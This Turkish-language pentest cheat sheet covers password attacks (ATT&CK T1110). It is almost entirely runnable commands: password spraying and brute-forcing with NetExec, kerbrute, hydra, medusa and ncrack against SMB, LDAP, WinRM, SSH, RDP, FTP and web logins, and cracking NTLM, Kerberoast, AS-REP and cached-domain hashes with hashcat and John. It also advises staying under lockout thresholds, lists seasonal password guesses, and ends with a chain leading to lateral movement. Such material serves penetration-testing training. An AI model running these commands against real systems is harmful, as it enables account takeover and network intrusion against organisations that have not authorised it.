Skip to content

Parola Saldırıları & Spraying

ATT&CK T1110 difficulty: kolay-orta

Parola saldırıları online (servise karşı deneme) ve offline (ele geçirilen hash’leri kırma) olarak ikiye ayrılır (T1110). Kurumsal ağlarda en etkili yöntem, tek parolanın çok kullanıcıda denendiği password spraying’dir — kilitlenme eşiğinin altında kalır.

- Kullanıcı listesi (enum, OSINT, RID brute, SMTP VRFY)
- Hedef protokol (SMB, LDAP, Kerberos, RDP, SSH, HTTP)
- Lockout eşiği bilgisi (pass-pol) — yoksa çok yavaş ilerle
- Offline: hash + doğru hashcat mode
Terminal window
nxc smb 10.10.10.5 -u user -p 'KnownPass' --pass-pol
Terminal window
rpcclient -U 'user%KnownPass' 10.10.10.5 -c "getdompwinfo"
Terminal window
nxc smb 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!' --continue-on-success
Terminal window
nxc ldap 10.10.10.5 -u users.txt -p 'Sonbahar2025!'
Terminal window
nxc winrm 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!'
Terminal window
kerbrute passwordspray -d hedef.local --dc 10.10.10.5 users.txt 'Sonbahar2025!'
  1. Kullanıcı listesi oluştur — OSINT, enum4linux, RID brute, e-posta biçimi ( ad.name , a.name , anam ), kerbrute userenum.

  2. Politikayı öğren — lockout threshold, observation window, min length; eşik altında kal (ör. threshold 5 ise tur başına ≤3, 31+ dk bekle).

  3. Mevsim+yıl / şirket kalıpları — Yaz2025! , Sirket2025 , Welcome1 , Password1! , lokal dil türevleri; SecLists Passwords/Common-Credentials .

  4. Başarıyı doğrula ve genişlet — nxc … –shares / -x whoami ; yanal hareket ve ikinci spray turu (farklı parola).

Terminal window
kerbrute userenum -d hedef.local --dc 10.10.10.5 users.txt
Terminal window
nxc smb 10.10.10.5 -u user -p pass --rid-brute 10000
Terminal window
hydra -l admin -P rockyou.txt ssh://10.10.10.5 -t 4
Terminal window
hydra -L users.txt -P pass.txt 10.10.10.5 smb
Terminal window
hydra -l admin -P pass.txt rdp://10.10.10.5
Terminal window
hydra -L users.txt -P pass.txt 10.10.10.5 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid|incorrect"
Terminal window
medusa -h 10.10.10.5 -u admin -P pass.txt -M ssh
Terminal window
ncrack -p 22 --user admin -P pass.txt 10.10.10.5
Terminal window
hydra -l admin -P pass.txt ftp://10.10.10.5
Terminal window
hydra -L users.txt -P pass.txt 10.10.10.5 http-get /manager/html

Credential stuffing: sızıntı user:pass çiftlerini aynı/benzer kurumsal hesaplarda dene (kapsam ve yasal sınırlar içinde).

Terminal window
hashid hash.txt
Terminal window
hashcat -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule --username
Terminal window
hashcat -m 5600 netntlmv2.txt rockyou.txt
Terminal window
hashcat -m 13100 kerberoast.txt rockyou.txt -r rules/best64.rule
Terminal window
hashcat -m 18200 asrep.txt rockyou.txt
Terminal window
hashcat -m 2100 dcc2.txt rockyou.txt
Terminal window
john --format=nt hashes.txt --wordlist=rockyou.txt
Terminal window
john --format=krb5tgs kerb.txt --wordlist=rockyou.txt
Terminal window
hashcat -m 1000 ntlm.txt -a 3 '?u?l?l?l?l?d?d?d?d'
Terminal window
hashcat -m 1000 ntlm.txt -a 1 words1.txt words2.txt
Terminal window
cewl https://www.hedef.com -m 6 -w cewl.txt
Terminal window
hashcat --force --stdout word.txt -r rules/best64.rule | head
1000 NTLM
5500 NetNTLMv1
5600 NetNTLMv2
13100 Kerberos TGS-REP (RC4)
19600 Kerberos TGS-REP (AES128)
19700 Kerberos TGS-REP (AES256)
18200 Kerberos AS-REP
2100 DCC2 (cached domain creds)
22000 WPA-PBKDF2-PMKID+EAPOL

Password Spray · NetExec

embedded tool
Generated command
nxc smb 10.10.10.0/24 -u users.txt -p Sonbahar2025 --continue-on-success
kerbrute userenum → users.txt
→ pass-pol (threshold 5)
→ spray Sonbahar2025! → 3 hit
→ SMB enum / Kerberoast
→ hashcat 13100 → service account
→ lateral